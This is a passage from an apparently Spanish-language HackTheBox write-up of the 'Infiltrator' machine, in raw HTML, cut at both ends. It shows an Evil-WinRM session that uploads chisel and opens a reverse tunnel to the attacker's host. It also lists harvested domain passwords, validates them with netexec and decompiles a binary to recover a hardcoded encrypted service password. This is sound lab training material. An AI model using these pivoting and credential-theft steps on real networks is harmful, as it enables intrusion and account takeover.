class="p">|</span>findstr <span class="m">1412</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14121 0.0.0.0:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14122 0.0.0.0:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14123 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14125 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14126 0.0.0.0:0 LISTENING <span class="m">6472</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14127 0.0.0.0:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:14128 0.0.0.0:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP 127.0.0.1:14121 127.0.0.1:49826 ESTABLISHED <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP 127.0.0.1:49826 127.0.0.1:14121 ESTABLISHED <span class="m">6540</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:14122 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:14123 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:14125 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:14126 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">6472</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:14127 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:14128 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1408</span> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\P</span>rogram Files&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Basandonos en la <a href="https://support.outputmessenger.com/install-output-messenger-server/#RouterConfiguration_optional">documentacion</a> obtuvimos los puertos con <a href="https://github.com/jpillora/chisel/releases">chisel</a>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\P</span>rogram Files&gt; <span class="nb">cd</span> C:/programdata </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata&gt; mkdir temp<span class="p">;</span> <span class="nb">cd</span> temp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\p</span>rogramdata </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 5/27/2025 7:33 PM temp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; upload pivot/chisel.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Uploading /home/kali/htb/infiltrator/pivot/chisel.exe to C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp<span class="se">\c</span>hisel.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: <span class="m">11758248</span> bytes of <span class="m">11758248</span> bytes copied </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Upload successful! </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; .<span class="se">\c</span>hisel.exe client 10.10.14.86:9090 R:14121:localhost:14121 R:14122:localhost:14122 R:14123:localhost:14123 R:14124:localhost:14124 R:14125:localh </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\p</span>rogramdata<span class="se">\t</span>emp&gt; .<span class="se">\c</span>hisel.exe client 10.10.14.86:9090 R:14121:localhost:14121 R:14122:localhost:14122 R:14123:localhost:14123 R:14124:localhost:14124 R:14125:localhost:14125 </span></span><span class="line"><span class="cl">chisel.exe : 2025/05/27 19:36:35 client: Connecting to ws://10.10.14.86:9090 </span></span><span class="line"><span class="cl"> + CategoryInfo : NotSpecified: <span class="o">(</span>2025/05/27 19:3...0.10.14.86:9090:String<span class="o">)</span> <span class="o">[]</span>, RemoteException </span></span><span class="line"><span class="cl"> + FullyQualifiedErrorId : NativeCommandError </span></span><span class="line"><span class="cl">2025/05/27 19:36:35 client: Connected <span class="o">(</span>Latency 89.1997ms<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ./chisel server --port <span class="m">9090</span> --reverse </span></span><span class="line"><span class="cl">2025/05/27 22:36:33 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/05/27 22:36:33 server: Fingerprint <span class="nv">a6rii6EQ2DKQm8gZ6eUunubndCn0L2lSkUBT9rSND3E</span><span class="o">=</span> </span></span><span class="line"><span class="cl">2025/05/27 22:36:33 server: Listening on http://0.0.0.0:9090 </span></span><span class="line"><span class="cl">2025/05/27 22:36:37 server: session#1: tun: proxy#R:14121<span class="o">=</span>&gt;localhost:14121: Listening </span></span><span class="line"><span class="cl">2025/05/27 22:36:37 server: session#1: tun: proxy#R:14122<span class="o">=</span>&gt;localhost:14122: Listening </span></span><span class="line"><span class="cl">2025/05/27 22:36:37 server: session#1: tun: proxy#R:14123<span class="o">=</span>&gt;localhost:14123: Listening </span></span><span class="line"><span class="cl">2025/05/27 22:36:37 server: session#1: tun: proxy#R:14124<span class="o">=</span>&gt;localhost:14124: Listening </span></span><span class="line"><span class="cl">2025/05/27 22:36:37 server: session#1: tun: proxy#R:14125<span class="o">=</span>&gt;localhost:14125: Listening </span></span></code></pre></td></tr></table> </div> </div><h2 id="kturner-user">K.turner User</h2> <p>Tras realizar la instalacion del <a href="https://www.outputmessenger.com/lan-messenger-downloads/">cliente</a> ejecutamos la aplicacion en nuestro Kali. Anteriormente encontramos lo que parece ser una contrasena para K.turner en la descripcion del usuario, utilizamos estas credenciales y especificamos el servidor local.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">K.turner : MessengerApp@Pass! </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222274355.png" alt="image"></p> <h4 id="general-chat">General Chat</h4> <p>Encontramos en el <code>Chat General</code> un mensaje indicando el uso de la version en Windows.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20212203503.png" alt="image"></p> <h4 id="dev_chat">Dev_Chat</h4> <p>En el chat <code>Dev_chat</code> se habla sobre una aplicacion que permita obtener informacion por <strong>LDAP</strong> bajo el nombre <code>UserExplorer.exe</code>. Se indica que M.harris ya implemento una funcion de desencriptado en AES, ademas su uso es a traves de una terminal, se menciona una de las opciones como <code>-default</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20212204432_chat.png" alt="image"></p> <p>La aplicacion no se encuentra en algun directorio que M.harris tenga acceso.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\P</span>rogramData&gt; Get-ChildItem -Path C:<span class="se">\ </span>-Filter UserExplorer.exe -Recurse -ErrorAction SilentlyContinue -Force </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\P</span>rogramData&gt; </span></span></code></pre></td></tr></table> </div> </div><p>La version de linux se muestra con muchos &ldquo;glitches&rdquo; y bugs al intentar cargar otros chats o funcionalidades de la aplicacion por lo que pasamos a la version de Windows.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20212204053.png" alt="image"></p> <h3 id="output-wall">Output Wall</h3> <p>La opcion de Output Wall realiza una solicitud hacia el puerto 14126, puerto que no especificamos en chisel.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275930.png" alt="image"></p> <p>Obtuvimos el puerto con chisel, sin embargo, tras cargar nuevamente, el contenido no se mostraba por lo que abrimos Wireshark para observar las solicitudes HTTP, encontramos que, realiza una solicitud al puerto 14126 indicando un token en la url. Se muestra una respuesta pero la aplicacion parece no manejarla correctamente.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222271631.png" alt="image"></p> <p>Replicamos la solicitud en firefox y observamos contenido que no se muestra en la aplicacion.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213212438.png" alt="image"></p> <p>Se muestra un comentario de K.Turner donde se indica y muestra una demo de la aplicacion se especifica credenciales de M.harris.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213212521.png" alt="image"></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="s2">&#34;UserExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="brute-forcing">Brute Forcing</h2> <p>De manera manual tomamos los usuarios existentes en el chat General e intentamos autenticarnos con cada uno, realizando combinaciones <code>user:user</code> y <code>user:pass</code>, incluimos contrasenas ya conocidas, encontramos pares de credenciales aceptadas.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">K.turner : MessengerApp@Pass! </span></span><span class="line"><span class="cl">D.anderson : D.anderson </span></span><span class="line"><span class="cl">A.walker : A.walker </span></span><span class="line"><span class="cl">O.martinez : m@rtinez@1996! </span></span><span class="line"><span class="cl">m.harris : D3v3l0p3r_Pass@1337! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">L.clark : WAT?watismypass! </span></span><span class="line"><span class="cl">E.rodriguez : 5upper@338 &lt;--- password we changed earlier by d.anderson </span></span></code></pre></td></tr></table> </div> </div><h3 id="danderson-1">D.anderson</h3> <p>Se muestra con este usuario que winrm_svc reinicio su contrasena.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213213547.png" alt="image"></p> <h3 id="awalker">A.walker</h3> <p>En el chat de Chief Marketing Chat se muestra que A.walker solicito las credenciales de O.martinez: <code>O.martinez : m@rtinez@1996!</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275600.png" alt="image"></p> <h3 id="omartinez">O.martinez</h3> <p>Muestra una conversacion con winrm_svc sobre su contrasena.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213214539.png" alt="image"></p> <h3 id="mharris-1">m.harris</h3> <p>Con las credenciales de m.harris logramos el acceso a la output messenger, observamos la aplicacion enviada por admin en el log de mensajes.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213212759.png" alt="image"></p> <p>Encontramos el archivo en <code>%appdata%Output Messenger\&lt;ID&gt;\Received Files\202402\</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\O</span>utput Messenger<span class="se">\E</span>AAA<span class="se">\R</span>eceived Files<span class="se">\2</span>02402&gt; Get-FileHash -Path <span class="s2">&#34;UserExplorer.exe&#34;</span> -Algorithm SHA256 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Algorithm Hash Path </span></span><span class="line"><span class="cl">--------- ---- ---- </span></span><span class="line"><span class="cl">SHA256 BED0592CF78A84DF52EA936D5FEE8319D028D7E97CECC4DFCEAADE4A98B52BB9 C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\O</span>utput Messenger<span class="se">\E</span>AAA<span class="se">\R</span>eceived Files<span class="se">\2</span>02402<span class="se">\U</span>serExplorer.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\O</span>utput Messenger<span class="se">\E</span>AAA<span class="se">\R</span>eceived Files<span class="se">\2</span>02402&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Ademas vemos que las credenciales de M.harris son aceptadas por Kerberos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u m.harris -p <span class="s1">&#39;D3v3l0p3r_Pass@1337!&#39;</span> --continue-on-success -k </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\m</span>.harris:D3v3l0p3r_Pass@1337! </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h3 id="lclark--erodriguez">L.clark &amp;&amp; E.rodriguez</h3> <p>En el caso de estos dos ultimos no se muestra algun log de chat interesante. En el caso de E.rodriguez es posible utilizar la contrasena que anteriormente se <a href="https://sckull.github.io/posts/infiltrator/#user---erodriguez">cambio</a> con d.anderson.</p> <h1 id="user---winrm">User - WinRM</h1> <h2 id="application-analysis">Application Analysis</h2> <p>La ejecucion necesita conexion con el servidor.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\O</span>utput Messenger<span class="se">\E</span>AAA<span class="se">\R</span>eceived Files<span class="se">\2</span>02402&gt; .<span class="se">\U</span>serExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris </span></span><span class="line"><span class="cl">Attempting Service Connection... </span></span><span class="line"><span class="cl">Service Connection Successful. </span></span><span class="line"><span class="cl">Search <span class="k">for</span> M.harris user... </span></span><span class="line"><span class="cl">An error occurred: El servidor no es funcional. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\O</span>utput Messenger<span class="se">\E</span>AAA<span class="se">\R</span>eceived Files<span class="se">\2</span>02402&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="decompile---ilspy">Decompile - ILSpy</h2> <p>Ejecutamos <a href="https://github.com/icsharpcode/ILSpy">ILSpy</a> y cargamos el ejecutable. Encontramos que existe la clase <code>Decryptor</code> que utiliza AES.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213213921.png" alt="image"></p> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me - Decryptor </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c#" data-lang="c#"><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System.IO</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System.Security.Cryptography</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System.Text</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kd">public</span> <span class="k">class</span> <span class="nc">Decryptor</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">string</span> <span class="n">DecryptString</span><span class="p">(</span><span class="kt">string</span> <span class="n">key</span><span class="p">,</span> <span class="kt">string</span> <span class="n">cipherText</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">Aes</span> <span class="n">aes</span> <span class="p">=</span> <span class="n">Aes</span><span class="p">.</span><span class="n">Create</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">aes</span><span class="p">.</span><span class="n">Key</span> <span class="p">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">key</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">aes</span><span class="p">.</span><span class="n">IV</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[</span><span class="m">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">ICryptoTransform</span> <span class="n">transform</span> <span class="p">=</span> <span class="n">aes</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">aes</span><span class="p">.</span><span class="n">Key</span><span class="p">,</span> <span class="n">aes</span><span class="p">.</span><span class="n">IV</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">MemoryStream</span> <span class="n">stream</span> <span class="p">=</span> <span class="k">new</span> <span class="n">MemoryStream</span><span class="p">(</span><span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">cipherText</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">CryptoStream</span> <span class="n">stream2</span> <span class="p">=</span> <span class="k">new</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">transform</span><span class="p">,</span> <span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Read</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">StreamReader</span> <span class="n">streamReader</span> <span class="p">=</span> <span class="k">new</span> <span class="n">StreamReader</span><span class="p">(</span><span class="n">stream2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">streamReader</span><span class="p">.</span><span class="n">ReadToEnd</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div> <p>En la clase <code>LdapApp</code> funcion Main encontramos el usuario winrm_svc un cifrado junto con la key.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20213214033.png" alt="image"></p> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me - LdapApp </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c#" data-lang="c#"><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System.DirectoryServices</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kd">internal</span> <span class="k">class</span> <span class="nc">LdapApp</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kd">private</span> <span class="kd">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">path</span> <span class="p">=</span> <span class="s">&#34;LDAP://dc01.infiltrator.htb&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">text</span> <span class="p">=</span> <span class="s">&#34;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">text2</span> <span class="p">=</span> <span class="s">&#34;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">text3</span> <span class="p">=</span> <span class="s">&#34;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">text4</span> <span class="p">=</span> <span class="s">&#34;winrm_svc&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">cipherText</span> <span class="p">=</span> <span class="s">&#34;TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p">&lt;</span> <span class="n">args</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span> <span class="p">+=</span> <span class="m">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">switch</span> <span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">ToLower</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="s">&#34;-u&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">text</span> <span class="p">=</span> <span class="n">args</span><span class="p">[</span><span class="n">i</span> <span class="p">+</span> <span class="m">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="s">&#34;-p&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">text2</span> <span class="p">=</span> <span class="n">args</span><span class="p">[</span><span class="n">i</span> <span class="p">+</span> <span class="m">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="s">&#34;-s&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">text3</span> <span class="p">=</span> <span class="n">args</span><span class="p">[</span><span class="n">i</span> <span class="p">+</span> <span class="m">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="s">&#34;-default&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">text</span> <span class="p">=</span> <span class="n">text4</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">text2</span> <span class="p">=</span> <span class="n">Decryptor</span><span class="p">.</span><span 